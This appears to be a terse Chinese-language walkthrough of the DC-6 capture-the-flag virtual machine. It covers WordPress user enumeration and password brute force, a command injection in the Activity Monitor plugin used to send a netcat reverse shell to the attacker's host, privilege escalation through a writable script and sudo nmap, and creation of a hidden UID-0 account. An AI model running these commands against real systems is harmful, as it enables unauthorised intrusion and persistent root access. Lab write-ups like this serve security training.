DC-6

第一步信息收集

1

192.168.213.158

2

Vi /etc/hosts 把重定向加上就行了

接着扫目录发现跟之前打过的靶机有点像

3

4

用wpscan(专门搜索wordpross漏洞)再看看

Wpscan –url http://wordy

5

用wpscan枚举一下用户名

Wpscan –url http://wordy –enumerate u

6

爆出几个账号,cat > 1.txt 保存一下,然后wpscan –url http://wordy -U 1.txt -P rockyou.txt

7

Url/wp-login.php 登录后台发现activity monitor

用searchsploit activity monitor

8

9这里有命令执行,127.0.0.1|nc -e /bin/bash 192.168.213.137 9999

10

拿到普通权限

Python -c ‘import pty;pty.spawn(“/bin/bash”)’

在主机内部找信息

11

Ssh graham@192.168.213.158

提权

12

我们发现当前账号对backups.sh读写操作

把shell写入backups

Echo “/bin/bash” >> backups.sh

Sudo -u jens ./backups.sh //这里用jens执行backups

13

发现切换账号成功

Sudo -l发现jens可以用root执行nmap,那就用nmap提权

14

需要先看nmap的版本号 nmap -v

然后把shell写入”shell”里,用nmap执行

echo ‘os.execute(“/bin/sh”)’ > shell

sudo nmap –script=shell

15

添加root账号

useradd -u 0 -o -g 0 -G root -s /bin/bash -d /home/root1-m root1